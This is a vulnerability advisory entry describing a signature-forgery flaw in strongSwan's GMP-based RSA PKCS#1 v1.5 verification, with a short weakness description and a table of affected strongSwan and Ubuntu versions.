In verify_emsa_pkcs1_signature() in gmp_rsa_public_key.c in the gmp plugin in strongSwan 4.x and 5.x before 5.7.0, the RSA implementation based on GMP does not reject excess data in the digestAlgorithm.parameters field during PKCS#1 v1.5 signature verification. Consequently, a remote attacker can forge signatures when small public exponents are being used, which could lead to impersonation when only an RSA signature is used for IKEv2 authentication. This is a variant of CVE-2006-4790 and CVE-2014-1568.
The product does not verify, or incorrectly verifies, the cryptographic signature for data.
Name | Vendor | Start Version | End Version |
---|---|---|---|
Strongswan | Strongswan | 4.0.0 (including) | 4.6.4 (including) |
Strongswan | Strongswan | 5.0.0 (including) | 5.7.0 (excluding) |
Strongswan | Ubuntu | bionic | * |
Strongswan | Ubuntu | devel | * |
Strongswan | Ubuntu | trusty | * |
Strongswan | Ubuntu | xenial | * |